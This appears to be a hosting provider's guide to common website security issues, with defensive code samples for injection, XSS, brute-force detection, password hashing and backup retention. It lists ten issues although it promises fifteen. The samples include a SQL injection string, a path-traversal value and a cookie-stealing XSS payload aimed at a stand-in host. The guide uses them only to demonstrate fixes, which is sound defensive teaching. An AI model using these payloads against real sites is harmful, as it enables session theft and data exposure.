Any website or online application – whether it’s an Internet bank processing millions of dollars in transactions daily or a storefront for small neighborhood businesses – can fall victim to malicious attacks and Internet security issues. Hackers often choose their targets by vulnerability, not by size or notoriety. Smaller systems, which may not even contain sensitive data, can be more tempting targets simply because they are easier to hack.
One might view website security as a single protective shell around a site and server, which can be strengthened or weakened. A more accurate perspective is that every cyber security measure is a layer of protection. Each layer you add keeps your data safer. Many layers will be redundant, and this is good. It may seem counterintuitive or paranoid, but the best approach when securing your site is to assume each layer will fail. For example, two-factor authentication adds a second layer of authentication under the assumption that the primary password will one day be stolen.
But what exactly is a security issue?
What is a Security Issue?
A security issue is any unmitigated risk or vulnerability in your system that hackers can use to do damage to systems or data. This includes vulnerabilities in the servers and software connecting your business to customers, as well as your business processes and people. A vulnerability that hasn’t been exploited is simply a vulnerability that hasn’t been exploited yet. Web security problems should be addressed as soon as they are discovered, and effort should be put into finding them because exploit attempts are inevitable.
Here are the 15 most common types of Internet security issues or web security problems and some relevant steps you can take to protect yourself, your data, and your business.
1. Ransomware Attack
The goal of a ransomware attack is to gain exclusive control of critical data. The hacker encrypts and holds your data hostage and then demands a ransom payment in exchange for the decryption key you need to access the files. The attacker may even download and threaten to release sensitive data publicly if you do not pay by a deadline. Ransomware is the type of attack you’re most likely to see reported in major news media.
How to Prevent: The most effective ransomware protection is a thorough, frequent backup of critical data kept where the attacker cannot reach it: offline, or on storage that the compromised systems can only add copies to and never delete or overwrite. A backup the attacker can encrypt along with everything else is no backup at all. With a tested backup and recovery plan, the attacker loses leverage, and you can erase and restore the affected systems. Note that backups do nothing about the second threat described above, the release of stolen data, so preventing the initial intrusion still matters.
2. Code Injection (Remote Code Execution)
To attempt a code injection, an attacker will search for places your application accepts user input – such as a contact form, data-entry field, or search box. Then, through experimentation, the hacker learns what various requests and field content will do.
For example, if your site’s search function places terms into a database query, they will attempt to inject other database commands into search terms. Alternatively, if your code pulls functions from other locations or files, they will attempt to manipulate those locations and inject malicious functions.
How to Prevent: Besides server or network-level protections like Cloudflare and Liquid Web’s Server Secure Plus, it is also important to address this security issue from a development perspective.
Keep any framework, CMS, or development platform regularly updated with security patches. When programming, follow best practices regarding input sanitization. No matter how insignificant, all user input should be checked against a basic set of rules for what input is expected.
For example, if the expected input is a five-digit number, reject anything that is not exactly five digits rather than trying to strip the bad characters out. For database queries, do not rely on escaping functions alone: use the parameterized (prepared) statements that every mainstream database driver provides, so the input is bound as data and is never parsed as SQL. Apply the same rule to file paths and include targets: resolve them against a fixed allow-list instead of building them from user-supplied strings.
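The two injection cases described above, worked through as an added example that is not from the original article: a search function that pastes the term into the SQL text beside its parameterized fix, the five-digit allow-list check, and an allow-list lookup for the "load a file named by the request" case. The product rows, the `PAGE_TEMPLATES` map and the injection payload are constructed for the demonstration; SQLite is used only because it runs in memory without a server.

```python
import re
import sqlite3

# Constructed sample data: a tiny product table with one unpublished row that a
# public search should never reveal.
PRODUCTS = [
    (1, "blue widget", 1),
    (2, "red widget", 1),
    (3, "internal prototype", 0),
]


def make_db():
    """Builds an in-memory SQLite database holding PRODUCTS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, published INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def search_vulnerable(conn, term):
    """The 'before': the search term is pasted into the SQL text. A term such as
    %' OR 1=1 -- becomes ... LIKE '%%' OR 1=1 --%' ORDER BY id, where the comment
    marker swallows the rest of the statement and OR 1=1 defeats published = 1."""
    sql = ("SELECT name FROM products WHERE published = 1 AND name LIKE '%"
           + term + "%' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term):
    """The fix: the term is bound as a parameter. The driver hands it to the
    engine as data, so it can never change the shape of the query. (The LIKE
    wildcards % and _ inside the term still act as wildcards; that is a search
    semantics question, not an injection.)"""
    sql = "SELECT name FROM products WHERE published = 1 AND name LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


FIVE_DIGITS = re.compile(r"[0-9]{5}")


def validate_zip(value):
    """Allow-list validation for the five-digit example in the text: returns the
    trimmed value when it is exactly five ASCII digits, otherwise None. Reject,
    do not try to repair."""
    value = value.strip()
    return value if FIVE_DIGITS.fullmatch(value) else None


# Hypothetical page-to-template map for the second injection type the text
# describes (code that loads a file or function named by the request).
PAGE_TEMPLATES = {
    "home": "templates/home.html",
    "about": "templates/about.html",
}


def resolve_template(page):
    """Looks the requested page up in a fixed allow-list instead of building a
    path from the request, so a value like ../../etc/passwd resolves to None."""
    return PAGE_TEMPLATES.get(page)


if __name__ == "__main__":
    db = make_db()
    payload = "%' OR 1=1 --"
    print("vulnerable:", search_vulnerable(db, payload))  # leaks the unpublished row
    print("safe:      ", search_safe(db, payload))        # []
```

Run it once with the payload and once with an ordinary term: both functions return the same rows for "widget", and only the parameterized one keeps returning nothing when the term tries to rewrite the query.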
3. Cross-Site Scripting (XSS) Attack
Hackers use XSS to attack your customers by using your site as a vehicle: a script injected into one of your pages runs in each visitor's browser with that visitor's session, where it can steal session cookies, submit actions as the logged-in user, or redirect to malware or unsolicited advertisements. As a result, your company's reputation can be tarnished, and you can lose customer trust.
How to Prevent: The primary defense is in your code: treat every piece of user-supplied data as text, and encode it for the context it lands in (HTML body, attribute value, URL, JavaScript) at the moment it is written into the page. Modern template engines do this by default unless you switch it off. As a second layer, set a Content Security Policy that limits the sources of scripts and images to your own domain plus whatever external URLs you specifically require, and that does not allow inline scripts. This small and often-overlooked header stops many injected scripts from executing even when an encoding mistake slips through.
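Both layers from the paragraph above, as an added example that is not from the original article: a page fragment that echoes a search term unencoded beside one that encodes per output context, and a builder for the Content-Security-Policy header value. The payload and the `cdn.example.com` host are constructed for the demonstration; the encoders are the minimal ones the contexts need, not a replacement for your template engine's.

```javascript
// Constructed user input: a "search term" carrying a cookie-stealing script and a
// hypothetical attacker host.
const PAYLOAD = '<script>location="https://evil.example/?c="+document.cookie</script>';

// Entity-encode the five characters that can break out of HTML text or a quoted
// attribute value. Encoding everything else is unnecessary.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// The 'before': the term is dropped into the page unchanged, so the browser
// treats the attacker's markup as part of your page and runs the script.
function renderResultsVulnerable(term) {
  return `<p>Results for: ${term}</p>`;
}

// The fix: encode for each context separately. HTML text and quoted attributes
// get entity encoding; a URL query component gets percent-encoding.
function renderResultsSafe(term) {
  const asText = escapeHtml(term);
  const asAttr = escapeHtml(term);
  const asUrl = encodeURIComponent(term);
  return `<p>Results for: ${asText}</p>` +
    `<input type="text" name="q" value="${asAttr}">` +
    `<a href="/search?q=${asUrl}">permalink</a>`;
}

// Crude check used only to show the difference between the two renderers.
function containsScriptTag(markup) {
  return markup.toLowerCase().includes("<script");
}

// Builds the Content-Security-Policy value the text describes: scripts and images
// only from this origin plus an explicit allow-list. There is no 'unsafe-inline'
// keyword, so an injected inline <script> is refused by the browser even when an
// encoding mistake lets it into the page.
function cspHeader(extraScriptSources = []) {
  const scriptSrc = ["'self'", ...extraScriptSources].join(" ");
  return [
    "default-src 'self'",
    `script-src ${scriptSrc}`,
    "img-src 'self'",
    "object-src 'none'",
    "base-uri 'self'",
    "frame-ancestors 'none'",
  ].join("; ");
}

console.log(renderResultsVulnerable(PAYLOAD));  // the script tag survives intact
console.log(renderResultsSafe(PAYLOAD));        // &lt;script&gt;... in every context
console.log("Content-Security-Policy: " + cspHeader(["https://cdn.example.com"]));
```

Send the header on every HTML response. Start it as `Content-Security-Policy-Report-Only` with a `report-uri` or `report-to` directive for a few days so you find every script and image your own pages legitimately load before you enforce it.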
4. Malware and Virus Infection
Malware is short for malicious software. Malware on a workstation can encrypt data for ransomware purposes or even log keystrokes to capture passwords. Hackers typically use malware to expand existing access to your site or spread access to others on the same network.
If malware is present, you’ve already been breached. Therefore, it’s crucial to determine which Internet security issues led to the breach before any malware cleanup or restoration.
How to Prevent: On workstations, mitigate the risk of this security problem by being careful about what you download and by using antivirus software to find and safely remove any malware. Keeping these antivirus applications regularly updated is critical, as malware is constantly updated and improved. In addition, day-to-day workstation logins should be standard user accounts without administrative access, so that malware running as the user cannot install itself system-wide or disable protections. In a worst-case scenario, keep good backups to restore the workstation if it is compromised too deeply to clean.
5. DDoS Attack
Distributed Denial of Service (DDoS) attacks are generally not attempting to gain access. However, they are sometimes used in conjunction with brute force attacks (explained below) and other attack types as a way to make log data less useful during your investigation.
For example, the hacker may directly attack your application layer by overwhelming your site with more requests than it can handle. They may not even request an entire page, just a single expensive image or script URL with a flood of concurrent requests. Beyond the traffic flood making your site unreachable (which any volumetric attack will do), a Layer 7 attack can inflict further damage by flooding order queues or polling data with bogus transactions that require extensive and costly manual verification to sort out.
How to Prevent: Blocking such an attack can be nearly impossible by conventional means. There is generally no security issue being exploited. The requests themselves are not malicious and deliberately blend in with normal traffic. The more widely distributed the attack, the more difficult it is to distinguish legitimate requests from those that are not.
If you’re not able to use a DDoS protection service, options are fairly limited and vary case by case. The most effective measures absorb all the traffic by increasing available server and network resources to accommodate the additional traffic until the attack subsides or can be isolated.
6. Brute Force Attack
In a brute force attack, the hacker (usually with the help of automation) tries multiple password guesses in various combinations until one is successful. In simpler terms, think of it as opening a combination padlock by trying every possible combination of numbers in order.
How to Prevent: Many CMSs and mainstream applications include, or offer as a plugin, a component that watches for repeated login failures and throttles or temporarily locks out the source. These are the best preventions for brute force attacks because they cut the number of guesses an attacker can make from millions to a handful. Count failures per source address and per account, and prefer increasing delays or a CAPTCHA over hard account lockouts, which an attacker can otherwise trigger on purpose to lock legitimate users out. Pair this with two-factor authentication so that a guessed password alone is not enough.
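The failure-counting logic described above, run over sample access-log lines, as an added example that is not from the original article. The log lines are constructed in combined log format, and the assumed application answers a failed `POST /login` with 401 and a successful one with 302; adjust the path and status to what your own application emits (WordPress, for instance, re-renders the form with a 200 on failure). The detector keeps a sliding window of failures per source address and reports the moment each address reaches the threshold, which is the point at which a throttle or block would be applied.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: a scripted burst of failed logins from 203.0.113.7 with
# an ordinary user's traffic from 198.51.100.23 mixed in.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "POST /login HTTP/1.1" 401 512 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "POST /login HTTP/1.1" 401 512 "-" "python-requests/2.31"
198.51.100.23 - - [10/Mar/2024:12:00:03 +0000] "GET /login HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:04 +0000] "POST /login HTTP/1.1" 401 512 "-" "python-requests/2.31"
198.51.100.23 - - [10/Mar/2024:12:00:05 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:06 +0000] "POST /login HTTP/1.1" 401 512 "-" "python-requests/2.31"
198.51.100.23 - - [10/Mar/2024:12:00:07 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:08 +0000] "POST /login HTTP/1.1" 401 512 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2024:12:00:10 +0000] "POST /login HTTP/1.1" 401 512 "-" "python-requests/2.31"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse(line):
    """Returns (ip, timestamp, method, path, status) or None for an unparseable line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def find_brute_force(lines, threshold=5, window=timedelta(minutes=5),
                     login_path="/login", failure_status=401):
    """Sliding-window count of failed login POSTs per source address. Returns
    {ip: timestamp} giving, for each offending address, the first moment it
    reached `threshold` failures inside `window`. Successes and GETs are ignored,
    so a user who simply reloads the form is never counted."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if not (method == "POST" and path == login_path and status == failure_status):
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


if __name__ == "__main__":
    for ip, when in find_brute_force(SAMPLE_LOG.splitlines()).items():
        print(f"{ip} reached the failure threshold at {when.isoformat()}")
```

The same loop keyed on the target account instead of the source address catches a distributed attack that spreads its guesses over many addresses; in production run both, and feed the result to the throttle rather than to a permanent block list, since the source addresses are often compromised hosts belonging to somebody else.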
7. Weak Passwords and Authentication Issues
A chain is only as strong as its weakest link, and a computer system is only as secure as its weakest password. Therefore, for any level of access, all passwords should be of sufficient length and complexity. A strong password should include 18 characters minimum, and the longer, the better. Password length increases security more than complexity.
A password like “dK3(7PL” can be cracked faster than a password like “ThisPasswordIsSixWordsLong” even though the latter contains dictionary words.
How to Prevent: Use two-factor authentication wherever available. This can protect a login even if the correct password is obtained or guessed. Use a password manager so that every account gets its own long, random password, and never reuse a password across systems: one breached site then cannot open your others. Change a password immediately when there is any sign it has been exposed. Forcing routine rotation every 60 or 90 days is no longer recommended (current NIST guidance in SP 800-63B advises against it), because it pushes people toward short, predictable variations of the same password.
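The server side of the advice in this section, as an added example that is not from the original article: a policy check that enforces the text's 18-character minimum and a breached-password list instead of composition rules, salted scrypt hashing with constant-time verification so a stolen user table yields no passwords, and the TOTP algorithm behind authenticator-app second factors (RFC 6238 over RFC 4226). The `COMMON_PASSWORDS` set is a constructed stand-in for a real breached-password corpus, and the scrypt parameters are an assumption you should tune to your hardware.

```python
import hashlib
import hmac
import os

MIN_LENGTH = 18  # the minimum the text recommends

# Constructed stand-in for a breached-password list. A real deployment checks
# against a full corpus (for example the Have I Been Pwned range API).
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome1"}


def check_policy(password):
    """Returns the reasons a password is rejected (empty list means accepted).
    Only length and known-breached status are checked, no composition rules,
    matching the text's point that length beats complexity."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if password.lower() in COMMON_PASSWORDS:
        problems.append("appears in breached-password list")
    return problems


def hash_password(password, salt=None):
    """Stores a password as a salted scrypt hash in a self-describing string, so a
    stolen database yields no plaintext and every password must be cracked
    separately at the full cost of the key-derivation function."""
    salt = os.urandom(16) if salt is None else salt
    n, r, p = 2 ** 14, 8, 1  # assumed work factor; raise n as hardware allows
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=n, r=r, p=p, dklen=32)
    return f"scrypt${n}${r}${p}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recomputes the hash with the stored parameters and compares in constant
    time, so the comparison leaks nothing about how many bytes matched."""
    scheme, n, r, p, salt_hex, digest_hex = stored.split("$")
    if scheme != "scrypt":
        raise ValueError("unsupported hash scheme")
    digest = hashlib.scrypt(password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
                            n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def hotp(secret, counter, digits=6):
    """HMAC-based one-time password (RFC 4226): HMAC-SHA1 over the 8-byte counter,
    dynamic truncation, then the low `digits` decimal digits."""
    mac = hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, unix_time, step=30, digits=6):
    """Time-based one-time password (RFC 6238): HOTP over the 30-second counter."""
    return hotp(secret, int(unix_time) // step, digits)


def verify_totp(secret, code, unix_time, step=30, skew=1):
    """Accepts the current code and one step either side to tolerate clock drift.
    Widening `skew` hands the attacker more valid codes per guess, so keep it small
    and rate-limit second-factor attempts exactly like password attempts."""
    return any(hmac.compare_digest(totp(secret, unix_time + k * step, step), code)
               for k in range(-skew, skew + 1))


if __name__ == "__main__":
    stored = hash_password("ThisPasswordIsSixWordsLong")
    print(stored)
    print(verify_password("ThisPasswordIsSixWordsLong", stored))  # True
    print(totp(b"12345678901234567890", 59, digits=8))            # 94287082 (RFC 6238 vector)
```

The TOTP secret is shared with the user's authenticator app at enrolment; store it encrypted, not alongside the password hash in plain form, because anyone who reads it can mint valid second-factor codes.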
8. Social Engineering
Social engineering encompasses all of the non-technical ways an attacker may use to gain access or do damage to your systems or data. The most common method is the oldest: lying or using fabricated information to gain trust.
A malicious actor may impersonate your bank, a utility provider, or even law enforcement. They may claim to be a customer or pose as an executive from your organization. The goal of such attacks is generally to either obtain sensitive information or trick an insider into unknowingly performing destructive actions.
They may try to:
- Obtain confidential contact details.
- Obtain account or credit card numbers.
- Obtain or reset passwords.
- Persuade staff to suspend or cancel essential services.
- Persuade staff to disable critical infrastructure.
- Persuade staff to upload or install malicious software.
Social engineering attacks can be devastatingly effective because the people who launch them are well-practiced in persuasion and deceit. Many have years of experience and finely-honed characters. For example, an attacker posing as law enforcement may give such a skilled performance that they’d fool an actual law enforcement officer. You absolutely cannot rely on your ability to judge character to protect yourself from these attacks.
How to Prevent: Watch for some of these common red-flag cues to become aware of social engineering at play:
- Aggressive language and demanding behavior designed to make you feel like you've done something wrong.
- A sense of urgency around fixing a problem before you have time to fact-check.
- Threats of legal action or financial penalty if you do not immediately comply.
- Evasion and escalated emotion when you ask identity-verification questions.
If someone claims to be from your bank, you should be able to reach that person by calling your bank’s publicly listed phone number and being routed by an operator. Likewise, if an email appears to be an invoice from a service provider, that provider will typically have an online portal or publicly listed customer service phone number you can call to confirm any outstanding bills.
9. Insider Threat
Betrayal from the inside can harm your company on multiple levels. A trusted employee or contractor can damage your systems, steal confidential information, and even sabotage team unity. The attacker doesn’t even need to be an employee. They could be anyone you trust, like a customer or a delivery driver. Much as with social engineering, you simply cannot rely on your ability to judge character to keep yourself safe.
How to Prevent: Beyond initial vetting and background confirmation of any new employee or contractor, you can further protect yourself by limiting users’ access within the organization. Only grant access to systems required for assigned tasks and only the minimum level of access necessary to complete said tasks.
Accountability is also critical. A malicious insider, like any hacker, prefers to be undetected. Do not use single shared logins for any systems. Do not give a contractor or employee your CMS login. Instead, create a specific login only for them with appropriate permissions. Disable this login when it isn’t needed anymore.
Staff should also stay current on security best practices. Lock workstations in your office or shop with a strong password any time they’re unattended. Also, disable automatic mounting of external disk drives.
10. No Backups
As we covered earlier, we add layers of security, assuming that previous layers will someday fail. Therefore, it’s important to have a recovery plan in place in the event of a total loss, whether from catastrophic system failure or malicious exploit of one of the web security problems discussed here. The best recovery plans always begin with thorough, regular backups and adequate backup retention policies.
How to Prevent: Specifics will vary by your needs but revolve around three backup best practices: The scope of your backups, the scheduling of your backups, and your backup retention policy.
- Scope: Make sure the backup scope covers all specific items you’d need to restore site functionality or business operations. It could be as little as a directory of files and a database or two or entire disks. Include any non-default server configurations or custom application installations. If you can’t afford to lose it or can’t recreate it quickly from a default installation, include it in your backups.
- Scheduling: This can be one of the hardest decisions to make. An appropriate backup schedule will save backups often enough to catch updates and ensure any restored site will be reasonably current – but not so often as to negatively impact site performance or cause sequential backups to be essentially identical.
- Retention: A common mistake here is simply keeping one backup from the previous night to allow restoration after a server failure. But what happens if a site compromise is small and goes unnoticed for a day or more? Then the only available backups are compromised as well. The farther back you can rewind the clock, the better your options are.
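The retention decision above worked through as an added example that is not from the original article: a grandfather-father-son plan that keeps every nightly backup for a week, the newest backup of each week for a month, and the newest of each month for a year, so a compromise that goes unnoticed for days or weeks still leaves a clean copy to rewind to. The nightly history is constructed (one backup per night for 400 days ending on a fixed date), and the tier sizes are assumptions to adjust to your storage budget.

```python
from datetime import date, timedelta

# Constructed history: one nightly backup for each of the last 400 days.
TODAY = date(2024, 3, 10)
NIGHTLY = [TODAY - timedelta(days=i) for i in range(400)]


def plan_retention(backup_dates, today, daily=7, weekly=4, monthly=12):
    """Grandfather-father-son retention. Keeps every backup from the last `daily`
    days, the newest backup of each ISO week for the last `weekly` weeks, and the
    newest backup of each calendar month for the last `monthly` months. Returns
    (keep, delete) as sorted lists of dates. The rewind horizon is therefore
    `monthly` months rather than a single night."""
    dates = sorted(set(d for d in backup_dates if d <= today))
    keep = set()

    # Daily tier: everything recent, so a small mistake can be undone precisely.
    for d in dates:
        if (today - d).days < daily:
            keep.add(d)

    # Weekly tier: one backup per ISO week, the newest one in that week.
    newest_per_week = {}
    for d in dates:
        if (today - d).days < weekly * 7:
            year, week, _ = d.isocalendar()
            key = (year, week)
            newest_per_week[key] = max(d, newest_per_week.get(key, d))
    keep.update(newest_per_week.values())

    # Monthly tier: one backup per calendar month, the newest one in that month.
    newest_per_month = {}
    for d in dates:
        months_ago = (today.year - d.year) * 12 + (today.month - d.month)
        if months_ago < monthly:
            key = (d.year, d.month)
            newest_per_month[key] = max(d, newest_per_month.get(key, d))
    keep.update(newest_per_month.values())

    delete = [d for d in dates if d not in keep]
    return sorted(keep), delete


if __name__ == "__main__":
    keep, delete = plan_retention(NIGHTLY, TODAY)
    print(f"keeping {len(keep)} of {len(NIGHTLY)} backups; oldest kept: {keep[0]}")
    for d in keep:
        print(d.isoformat())
```

Run the pruning only after the newest backup has been verified (checksum and a trial restore), never before, and have it delete through a path that the production servers themselves cannot use, so that the ransomware case in section 1 cannot turn the retention job against you.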